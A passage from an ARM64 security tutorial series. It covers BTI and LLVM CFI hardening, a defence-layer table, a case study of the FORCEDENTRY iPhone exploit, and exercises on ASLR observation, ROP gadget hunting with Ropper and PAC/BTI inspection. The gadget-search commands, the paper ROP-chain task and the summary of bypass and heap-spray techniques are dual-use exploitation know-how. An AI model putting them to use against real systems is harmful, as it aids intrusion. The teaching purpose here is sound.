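for case in (("blr", "x0", "bti c"), ("br", "x0", "bti c"),
             ("br", "x16", "bti c"), ("br", "x0", "stp")):
    print(case, bti_allows(*case))
```

The x16/x17 exception exists so that linker-generated veneers and PLT stubs, which branch through those registers, can reach ordinary function entries marked BTI C.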

LLVM CFI on AArch64

Software CFI (LLVM -fsanitize=cfi) instruments every indirect call with a type check that the compiler inserts and that executes at run time. Hardware + software CFI layers are complementary: BTI stops branch-to-arbitrary-code; LLVM CFI additionally restricts which typed functions a given call site may invoke.

# Build with LLVM CFI (requires LTO for cross-TU visibility)
# -fvisibility=hidden        gives symbols the hidden LTO visibility that CFI expects
# -fsanitize=cfi             enables all CFI sub-checks
# -fsanitize-cfi-cross-dso   extends enforcement across shared library boundaries
clang --target=aarch64-linux-gnu \
      -flto=thin \
      -fvisibility=hidden \
      -fsanitize=cfi \
      -fsanitize-cfi-cross-dso \
      -O2 -o cfi_target main.c liba.c

# Or enable specific sub-checks only
# cfi-icall = indirect call type check, cfi-nvcall = C++ non-virtual member call check
clang++ --target=aarch64-linux-gnu \
      -flto=thin -fvisibility=hidden \
      -fsanitize=cfi-icall,cfi-nvcall \
      -O2 -o cfi_partial main.cpp

# Test: calling a function through a mistyped pointer aborts the program
# (by default through a trap instruction rather than a diagnostic).
# For cfi-icall, the inline check at the call site verifies that the target
# lies inside the jump table generated for the expected function type;
# in cross-DSO mode, unknown targets go to the __cfi_slowpath runtime check.
CFI layers
Defence-in-depth stack against ROP/JOP on modern ARM64
| Layer | Mechanism | Defeats |
|---|---|---|
| Stack canary | -fstack-protector-all | Linear stack overflow |
| ASLR | Kernel mmap_rnd_bits | Hardcoded address shellcode |
| PAC (IA key) | ARMv8.3 FEAT_PAUTH | Return address overwrite |
| BTI | ARMv8.5 FEAT_BTI | Arbitrary indirect branch targets |
| LLVM CFI | -fsanitize=cfi | Wrong-type indirect calls |
| MTE (ARMv8.5) | Memory tagging | Heap/stack UAF and overflows |
| Shadow Call Stack | Clang -fsanitize=shadow-call-stack | LR overwrite even if PAC unavailable |

Case Study: ARM64 Exploitation in the Wild

Real-World Exploit

FORCEDENTRY (CVE-2021-30860) — Zero-Click iPhone Exploit

In September 2021, Citizen Lab disclosed FORCEDENTRY, a zero-click exploit targeting Apple's iMessage on ARM64 iPhones; Google Project Zero published a detailed technical analysis that December. The exploit chain was attributed to the NSO Group's Pegasus spyware and shows how a determined attacker works around the ARM64 defences covered in this article.

The attack path: A malformed PDF, disguised with a .gif extension, was sent via iMessage. It triggered an integer overflow in CoreGraphics' JBIG2 decoder, a format from the 1990s. The decoder's bitmap-combining operations (AND/OR/XOR on bitmap regions) were then used as logic gates to build a Turing-complete virtual machine inside the decoder itself. This VM bootstrapped a second-stage exploit that escaped the IMTranscoderAgent sandbox.

ARM64-specific elements: The exploit had to contend with PAC (enforced on ARM64e iPhones) and ASLR (with limited leak primitives, since no JavaScript engine was involved). It reached the vulnerable parser through IMTranscoderAgent, outside the BlastDoor sandbox that iOS 14 introduced to harden iMessage parsing. The JBIG2 VM approach suited these constraints because its computation ran entirely within data memory and did not require executing attacker-supplied code at that stage, so code-pointer protections such as PAC were not triggered while it ran.

Impact: Apple patched the vulnerability in iOS 14.8. Google's analysis called it "one of the most technically sophisticated exploits we've ever seen." It demonstrated that even layered defences (PAC, ASLR, sandboxing) can be circumvented when the attacker builds a computation engine entirely within data-processing logic.

Historical Evolution

ARM Exploitation: From Simple Overflows to Defence-Aware Chains (2005–2024)

2005–2010 — The Easy Years: Early ARM exploits (targeting Windows Mobile, early Android) used textbook stack buffer overflows. No ASLR, no canaries, no NX bit on ARMv5/v6. Shellcode was injected directly onto the stack and jumped to — identical to 1990s x86 exploitation but with Thumb/ARM encoding quirks.

2011–2015 — ASLR and NX Arrive: Android 4.1 (2012) enabled full ASLR. ARM added the XN (Execute Never) bit in page tables. Exploiters pivoted to ROP — the same transition that x86 went through 5–7 years earlier. AArch64's larger register file (31 GPRs) and consistent 4-byte instruction width made gadget finding cleaner than on ARM32's mixed ARM/Thumb encoding.

2016–2020 — PAC and Hardware Defences: Apple's A12 Bionic (2018) shipped FEAT_PAUTH — the first commercial PAC implementation. Research teams (PACMAN at MIT, 2022) demonstrated speculative execution could bypass PAC. Kernel exploitation shifted from code-pointer corruption to data-only attacks (overwriting cred structs, modifying selinux_enforcing).

2021–2024 — MTE and the Data-Only Era: ARMv8.5 MTE began appearing in production (Pixel 8, 2023). Google and Android adopted MTE for both heap and stack protection. Exploit development focused increasingly on logic bugs (race conditions, TOCTOU) rather than memory corruption, as PAC + BTI + MTE raised the cost of traditional memory exploitation to the point where only nation-state actors consistently succeed.

Hands-On Exercises

Exercise 1 — Beginner

ASLR Observation & Information Leak

Write a C program that prints the addresses of main(), a stack variable, a heap allocation, and printf() from libc. Run it 10 times with ASLR enabled and 10 times with ASLR disabled. Compare the addresses across runs to see which bits vary in each region; ten samples give only a rough lower bound on the entropy.

// aslr_probe.c — observe ASLR randomisation on ARM64
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void)
{
    int stack_var = 42;
    void *heap_var = malloc(64);

    printf("=== ASLR Probe ===\n");
    printf("main()    = %p  (code/PIE)\n", (void *)main);
    printf("stack_var = %p  (stack)\n",     (void *)&stack_var);
    printf("heap_var  = %p  (heap)\n",      heap_var);
    printf("printf    = %p  (libc)\n",      (void *)printf);
    printf("Δ libc-main = 0x%lx\n",
        (uintptr_t)printf - (uintptr_t)main);

    free(heap_var);
    return 0;
}

// Compile and run:
// aarch64-linux-gnu-gcc -pie -fPIE -O0 -o aslr_probe aslr_probe.c
// for i in $(seq 1 10); do qemu-aarch64 -L /usr/aarch64-linux-gnu ./aslr_probe | grep main; done
// setarch "$(uname -m)" -R qemu-aarch64 -L /usr/aarch64-linux-gnu ./aslr_probe  # ASLR off (setarch takes the host architecture)

Expected Learning: With ASLR, addresses change each run but offsets between symbols in the same region remain constant — demonstrating why a single leak defeats entire-module ASLR.
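
To turn the printed addresses into a rough entropy estimate, one option is to check which bits differ across runs. The helper below is a minimal sketch; `varying_bits` is an illustrative name and the sample addresses are made up, not real output from the probe.

```python
from functools import reduce


def varying_bits(samples):
    """Return (mask, count) of the address bits that differ across the samples."""
    all_or = reduce(lambda a, b: a | b, samples)
    all_and = reduce(lambda a, b: a & b, samples)
    mask = all_or ^ all_and          # bits set in some samples but not in all
    return mask, bin(mask).count("1")


# Made-up sample addresses for main() from three runs (paste your own here).
samples = [0x5555_5A3B_1754, 0x5555_7C10_4754, 0x5555_61F2_9754]
mask, count = varying_bits(samples)
print(f"varying mask = {mask:#x}, at least {count} random bits")
```

With only a handful of runs the count is a lower bound: a bit that happened to be identical in every sample may still be randomised. The low 12 bits never vary because mappings are page-aligned.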

Exercise 2 — Intermediate

ROP Gadget Hunting with Ropper

Install Ropper and search for gadgets in the AArch64 libc.so.6. Find gadgets to: (1) load x0 from the stack, (2) load x8 from the stack, (3) execute svc #0. Construct a payload layout (on paper) that would call write(1, "PWNED", 5) via the __NR_write syscall (64).

# Install ropper
pip install ropper

# Search for useful gadgets in ARM64 libc
ropper --file /usr/aarch64-linux-gnu/lib/libc.so.6 --arch ARM64 \
       --search "ldr x0"

# Find stack-loading gadgets
ropper --file /usr/aarch64-linux-gnu/lib/libc.so.6 --arch ARM64 \
       --search "ldp x0, x1, [sp"

# Find syscall gadgets
ropper --file /usr/aarch64-linux-gnu/lib/libc.so.6 --arch ARM64 \
       --search "svc"

# Count total available gadgets
ropper --file /usr/aarch64-linux-gnu/lib/libc.so.6 --arch ARM64 \
       --search "ret" | wc -l

# For write(1, buf, 5): x0=1, x1=buf_addr, x2=5, x8=64
# Sketch your chain: gadget1 (set x0,x1) → gadget2 (set x2,x8) → svc

Expected Learning: AArch64 has abundant ldp-based gadgets (loading two registers from stack simultaneously) due to the calling convention's prologue/epilogue pattern — making chain construction easier than on ARM32.

Exercise 3 — Advanced

Compile & Inspect BTI/PAC Protection

Compile a simple program with -mbranch-protection=standard (PAC + BTI) and without it. Disassemble both binaries and compare function prologues. Count the number of BTI, PACIASP, and AUTIASP instructions in each. Then use readelf to verify the GNU property notes.

# Create test program with indirect calls
cat > cfi_test.c <<'EOF'
#include <stdio.h>
typedef int (*fn_ptr)(int);

int double_it(int x)  { return x * 2; }
int triple_it(int x)  { return x * 3; }

int apply(fn_ptr f, int x) { return f(x); }

int main(void) {
    fn_ptr funcs[] = { double_it, triple_it };
    for (int i = 0; i < 2; i++)
        printf("Result: %d\n", apply(funcs[i], 21));
    return 0;
}
EOF

# Compile WITHOUT protection
aarch64-linux-gnu-gcc -O2 -o cfi_none cfi_test.c
aarch64-linux-gnu-objdump -d cfi_none | grep -cE "bti|paciasp|autiasp"

# Compile WITH PAC+BTI
aarch64-linux-gnu-gcc -O2 -mbranch-protection=standard \
    -march=armv8.5-a -o cfi_prot cfi_test.c
aarch64-linux-gnu-objdump -d cfi_prot | grep -cE "bti|paciasp|autiasp"

# Compare function prologues
echo "=== Without protection ==="
aarch64-linux-gnu-objdump -d cfi_none | grep -A5 "<double_it>:"
echo "=== With PAC+BTI ==="
aarch64-linux-gnu-objdump -d cfi_prot | grep -A5 "<double_it>:"

# Verify ELF notes
aarch64-linux-gnu-readelf -n cfi_prot | grep -A3 "NT_GNU_PROPERTY"

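Expected Learning: Protected binaries add PACIASP (which doubles as a BTI C landing pad) at the entry of functions that save LR, with AUTIASP before the matching RET; leaf functions such as double_it, which never spill LR, receive only BTI C under the default pac-ret scope. The GNU property note tells the dynamic linker to map the image with PROT_BTI so that its pages are guarded.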

Summary

ARM64 security research demands assembly-level fluency. The AArch64 calling convention, link-register return mechanism, and 64-bit virtual address space all shape the exploit primitive landscape:

  • ASLR: entropy is set by the kernel (mmap_rnd_bits on Linux); defeated via information leaks (stack over-reads, format strings, UAF, side-channels).
  • Stack canaries: bypassed by leak-then-overwrite or by writes that skip the canary, with brute-force against forked servers.
  • PAC: signs return addresses with cryptographic MACs; oracle attacks need a way to test candidate PACs without a fatal crash, and they benefit from a narrow PAC field.
  • ROP on AArch64: gadgets terminate in ret and must reload x30 from the stack; AAPCS64 provides eight argument registers (x0–x7) to set via load gadgets; ldp instructions create compact multi-register setup gadgets.
  • JOP: replaces ret with br x0; needs a dispatcher gadget; BTI enforcement in production binaries shrinks JOP gadget surfaces dramatically.
  • Kernel exploitation: UAF via slab with cross-cache heap spray remains the dominant pattern; msg_msg and pipe_buffer are the canonical spray objects.
  • Defences: BTI (hardware), PAC (hardware), LLVM CFI (software), MTE (hardware), Shadow Call Stack (software) create a layered security model where each layer independently raises the exploit cost.

Next in the Series

In Part 28: Emerging ARMv9 & Future Directions, we explore the technologies shipping in the latest ARM silicon: Memory Tagging Extension (MTE), Scalable Matrix Extension (SME), Confidential Compute Architecture (CCA) Realm VMs, and AI/ML matrix multiply instructions — closing the series with a forward-looking view of the ARM architecture roadmap.
